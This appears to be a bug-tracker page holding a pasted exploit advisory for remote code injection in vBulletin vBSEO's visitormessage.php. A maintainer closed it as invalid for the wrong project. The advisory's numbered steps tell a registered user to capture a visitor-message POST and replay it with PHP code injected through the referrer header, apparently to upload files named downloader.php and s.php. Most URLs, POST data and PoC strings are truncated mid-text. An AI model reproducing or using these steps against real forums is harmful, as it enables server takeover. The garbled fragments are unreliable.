vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
mantis (Ubuntu) |
Invalid
|
Undecided
|
Unassigned |
Bug Description
#######
[+] Exploit Title: vBulletin 4.x.x 'visitormessage
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my freinds ( #bhg )
#######
Remote Code Injection:
+++++++
1) You Must Register In The vBulletin http://
2) go to your user profile example: [http://
3) post something in visitor message and record post data with live http header
[example] : message_
1&s=&securityto
4- change message to anything "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin don't let you send same comment in a time]
[Now post this with hackbar:]
URL: http://
[Post data]
message_
1&s=&securityto
[And referrer data:]
PoC : http://
[Example referrer data:] > upload downloader.php and s.php
PoC : http://
"downloader.
5- Open hackbar and tamper it with taper data:
referrer data has been URL encoded by browser , you have to replace this again with tamper data: http://
and submit request.
#######
CVE References
summary: |
- Description you can get access from vbulletin forum, just inject php - code in one file. + vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection + Vulnerability |
description: | updated |
tags: | added: rce vbseo vbulletin |
information type: | Private Security → Public |
description: | updated |
Thank you for the very nice advisory; however, your advisory is about vBulletin and not MantisBT. vBulletin is not included in the Ubuntu archive. Closing.